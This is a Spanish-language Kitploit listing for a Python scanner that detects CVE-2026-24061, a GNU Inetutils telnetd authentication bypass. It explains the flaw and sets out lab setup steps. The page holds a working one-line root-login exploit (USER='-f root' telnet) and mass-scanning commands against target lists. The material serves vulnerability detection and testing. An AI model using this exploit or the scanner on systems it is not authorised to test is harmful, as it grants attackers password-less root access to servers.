Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-24061 — Escáner basado en Python que detecta CVE-2026-24061 en GNU Inetutils telnetd, permitiendo pruebas por lotes de múltiples objetivos para la vulnerabilidad de omisión de autenticación. | Kitploit
Herramientas/GitHubGitHub/monstertsl/cve-2026-24061
Escáneres de VulnerabilidadesExplotaciónPruebas de PenetraciónAutenticaciónHerramienta de Acceso Remoto
GitHubmonstertsl/cve-2026-24061

CVE-2026-24061

Escáner basado en Python que detecta CVE-2026-24061 en GNU Inetutils telnetd, permitiendo pruebas por lotes de múltiples objetivos para la vulnerabilidad de omisión de autenticación.

Ver Repositorio
1hace 7 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Herramienta de detección masiva de la vulnerabilidad CVE-2026-24061

⚠️ Nota: CVE-2026-24061 GNU Inetutils es un conjunto de herramientas de red clásicas proporcionado por el proyecto GNU, que incluye el servicio telnetd, es decir, el demonio del servidor Telnet. En las versiones 1.9.3 a 2.7, el servicio telnetd presenta un defecto crítico en el flujo de autenticación de usuarios. Cuando el servicio llama al programa de inicio de sesión del sistema /usr/bin/login, no logra filtrar ni validar eficazmente la variable de entorno USER enviada por el cliente. Un atacante puede inyectar directamente el parámetro -f en el comando login estableciendo un valor específico para la variable USER. El parámetro -f del programa se utiliza para "omitir la autenticación secundaria", lo que permite al atacante eludir por completo todos los mecanismos de verificación de contraseña y establecer directamente una sesión remota como usuario , obteniendo así el máximo control sobre el servidor. Esta vulnerabilidad es extremadamente peligrosa, equivalente a una puerta trasera remota de root pública que no requiere ninguna credencial.

login
root

POC de detección de la vulnerabilidad

root@kitploit:~
USER='-f root' telnet -a <target_ip>

Script de detección

demo.png

Detección individual

root@kitploit:~
python3 cve-2026-24061.py -i 10.10.168.128

Detección masiva

root@kitploit:~
python3 cve-2026-24061.py -f targets.txt

Principio de la vulnerabilidad

El comando anterior establece la variable de entorno USER en -f root. Cuando el servicio telnetd vulnerable recibe la conexión, construye y ejecuta una llamada al sistema similar a la siguiente:

Pasos para reproducir

1. Instalar los programas necesarios

root@kitploit:~
sudo apt update
sudo apt install openbsd-inetd inetutils-telnetd telnet -y

2. Descomentar la línea de telnet (asegurarse de que el formato sea correcto)

root@kitploit:~
sudo sed -i 's/^#telnet/telnet/' /etc/inetd.conf

3. Reiniciar el servicio

root@kitploit:~
sudo systemctl restart openbsd-inetd

4. Verificar el puerto

root@kitploit:~
sudo ss -tuln | grep ':23'

5. Prueba local

root@kitploit:~
telnet localhost 23
Descargar herramienta